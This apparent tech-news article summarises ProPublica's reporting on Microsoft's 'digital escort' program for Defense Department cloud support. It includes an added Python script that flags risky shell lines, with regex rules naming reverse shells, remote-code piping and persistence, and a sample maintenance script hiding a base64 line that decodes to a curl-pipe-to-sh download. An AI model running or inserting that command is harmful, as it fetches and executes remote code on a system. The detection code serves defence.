Microsoft has deployed Chinese engineers to maintain systems for the Department of Defense, putting highly confidential data at risk of being hacked

As the political and economic conflict between the United States and China deepens, the U.S. government is wary of attacks by Chinese hackers under the direction of the Chinese government. However, Microsoft is using Chinese engineers to maintain systems for the Department of Defense under a little-known program within the government called 'digital escorts,' according to a report by the non-profit news organization ProPublica.
Microsoft “Digital Escorts” Could Expose Defense Dept. Data to Chinese Hackers — ProPublica

The emergence of cloud technology in the 2000s, which provides on-demand computing power and data storage over the internet, led to the adoption of the cloud in U.S. federal government operations. However, the move to the cloud means the government is ceding some authority over how information is maintained and accessed to companies like Microsoft, which poses security risks.
In response, the US government launched the Federal Risk and Authorization Management Program (FedRAMP), a cloud service certification program, in 2011; it requires cloud providers to run background checks on employees who handle sensitive federal government data. The Department of Defense also issued its own cloud guidelines, stipulating that personnel who handle its sensitive data must be US citizens or permanent residents.
Because Microsoft employs a global workforce from India, China, the EU, and elsewhere, it was difficult for the company to comply with these requirements. ProPublica reports that a senior program manager named Indy Crowley came up with a program called 'Digital Escort' as a way to get around FedRAMP and Department of Defense requirements.
The process for a digital escort is as follows:
1: When a government customer needs technical support for a Microsoft cloud product, it submits a 'ticket' online, and the work can be assigned to Microsoft engineers in other countries, such as China.
2: A US-based 'escort' who receives the ticket holds an online meeting with the foreign engineer over Microsoft Teams.
3: The foreign engineer sends advice and commands to the escort, and the escort types those commands into the government system and carries out the operations.
In this way, engineers in countries like China can provide support without directly operating government systems.

But ProPublica points out that the escorts overseeing the work often lack the technical knowledge the foreign engineers have; they include 'former military personnel with little to no coding experience', paid a much lower hourly rate than the government's senior security officials.
This means that if a foreign engineer sends a command with malicious code inserted and instructs the escort to enter it, the escort may execute it without noticing the problem. A current escort who requested anonymity told ProPublica, 'I believe their actions are not malicious, but I don't know for sure.'
Microsoft initially worked with defense contractor Lockheed Martin's IT department to hire the escorts, but as the program expanded it began relying on subcontractors such as staffing firms. ProPublica's analysis found that escorts are hired by Insight Global and by ASM Research, a subsidiary of Accenture.
In January 2024, Insight Global posted
In a statement to ProPublica, Insight Global said, 'We assess each candidate's technical capabilities through our interview process to ensure they have the technical skills necessary for the job. The role may require a security clearance, but that's just one piece of the puzzle.' The company also explained that it trains its escorts in-house, and that they receive additional training in cyber attacks and 'insider threat awareness' as part of the government security clearance process.

Microsoft's digital escorts have received little attention within the government, with former government officials interviewed by ProPublica saying they had never heard of them. 'People literally don't know anything about digital escorts,' said Deven King, a spokesman for the Defense Information Systems Agency. 'So we don't know what to do about it.'
'If I were an agent, I would view digital escorts as extremely valuable access. We have to be very concerned,' said Harry Coker, a former senior official at the Central Intelligence Agency and the National Security Agency who served as White House national cyber director under President Joe Biden. He added that, during his time in the intelligence community, he would have loved to have had that kind of access into an adversary's systems.
Matthew Erickson, a former Microsoft engineer who helped develop Digital Escort, acknowledged in an email to ProPublica that 'if someone ran a script called 'fix_servers.sh' and it was actually malicious, [Escort] would never notice.' However, he pointed out that the scope of systems that could be compromised is limited, and that 'there is no reason to suspect someone just because of their country of origin,' and that 'we don't see any special threat from Microsoft employees based in other countries.'
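The 'fix_servers.sh' remark above is the crux of the risk: an escort who types what is dictated has no way to tell routine maintenance from a payload. As an added illustration (not code from the original article, from Microsoft or from ProPublica), the following Python script shows the kind of pre-execution triage an escort could run on a script before typing it in. It flags a handful of constructs that warrant reading the line rather than pasting it, and it decodes embedded base64 so that a command hidden inside a blob is judged as well. The rule list and the sample fix_servers.sh are constructed assumptions for this illustration, not an official checklist or a real script.

```python
"""Pre-execution triage of a shell script before an escort types it in.

Added illustration; the rules and the sample script are constructed for it.
"""
import base64
import re

# (pattern, reason) pairs that should stop an escort until the line is understood.
# This list is an assumption for the illustration, not an official checklist.
RULES = [
    (re.compile(r"\bbase64\b.*(-d|--decode)"), "decodes an embedded payload"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), "downloads and executes remote code"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "spawns a reverse shell"),
    (re.compile(r"/dev/tcp/"), "opens a raw outbound TCP connection"),
    (re.compile(r"authorized_keys|/etc/cron|\bcrontab\b"), "touches persistence (SSH keys or cron)"),
    (re.compile(r"\b(useradd|usermod|chpasswd|passwd)\b"), "changes local accounts"),
    (re.compile(r"\beval\b"), "evaluates a dynamically built command"),
    (re.compile(r"\S\s{40,}\S"), "hides a second command past the visible width"),
]

# A run of base64 alphabet long enough to carry a command rather than a word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blob(token):
    """Return the token decoded as text if it is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return raw.decode("ascii")
    return None


def triage(script):
    """Scan a script and return (line_no, reason, evidence) findings in reading order."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank lines and comments are not executed
        for pattern, reason in RULES:
            if pattern.search(line):
                findings.append((no, reason, line.strip()))
        for token in B64_TOKEN.findall(line):
            decoded = decode_blob(token)
            if decoded is None:
                continue
            findings.append((no, "embeds base64 text", decoded))
            # Re-scan the decoded text so a payload hidden inside the blob is judged too.
            for _inner_no, reason, evidence in triage(decoded):
                findings.append((no, f"decoded payload {reason}", evidence))
    return findings


# Constructed sample: a routine-looking maintenance script with one hostile line.
# The blob on line 6 decodes to "curl -s http://example.com/p | sh".
SAMPLE_SCRIPT = """#!/bin/bash
# fix_servers.sh - routine maintenance (constructed sample, not a real script)
set -e
systemctl restart app-gateway
journalctl --vacuum-time=7d
echo 'Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5jb20vcCB8IHNo' | base64 -d | sh
df -h
"""

if __name__ == "__main__":
    for no, reason, evidence in triage(SAMPLE_SCRIPT):
        print(f"line {no}: {reason}: {evidence}")
```

Run against the sample, the triage reports line 6 three times: once for the `base64 -d` pipe, once with the decoded text, and once because the decoded text itself downloads and runs remote code; the five benign lines produce nothing. A check like this does not make the escort a security engineer, but it turns 'type what you are told' into 'type only what you have read', which is the gap the article describes.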
ProPublica also requested an interview with a Microsoft executive, who declined. In a statement to ProPublica, Microsoft said its employees and contractors work 'in a manner consistent with U.S. government requirements and procedures,' and that it has extensive vetting processes, training and safeguards in place.
in Web Service, Security, Posted by log1h_ik